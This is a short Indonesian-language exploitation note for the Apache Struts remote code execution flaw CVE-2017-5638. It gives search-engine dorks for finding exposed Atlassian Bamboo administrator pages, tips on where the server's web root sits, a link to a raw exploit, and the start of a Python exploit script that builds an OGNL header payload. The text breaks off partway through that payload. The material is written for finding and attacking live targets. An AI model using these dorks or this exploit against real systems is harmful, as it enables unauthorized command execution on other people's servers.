CVE: 2017-5638 Title: Struts Unauthenticated RCE Dork: inurl: viewAdministrators.action [ Dork hasil pengembangan ] intext: Bamboo administrators inurl: viewAdministrators.action filetype: action site:in Kerentanan ini menyebabkan penyerang dapat mengakses perintah shell tanpa otenkasi (Unauthenticated). Melewati headers. public_html Kerentanan ini biasanya terletak di direktori '/opt'. Agak sulit menemukan public_html Kerentanan ini. Tips: Jika target menggunakan bamboo. root site terletak di (../atlassian-bamboo) * Kerentanan ini terletak di file action. Exploit scripts. Author: - Bahasa: python3 Raw: https://www.exploit-db.com/raw/41570 ''' #!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = "%{(#_='multipart/form-data')." payload += "(#dm=@ognl.Og...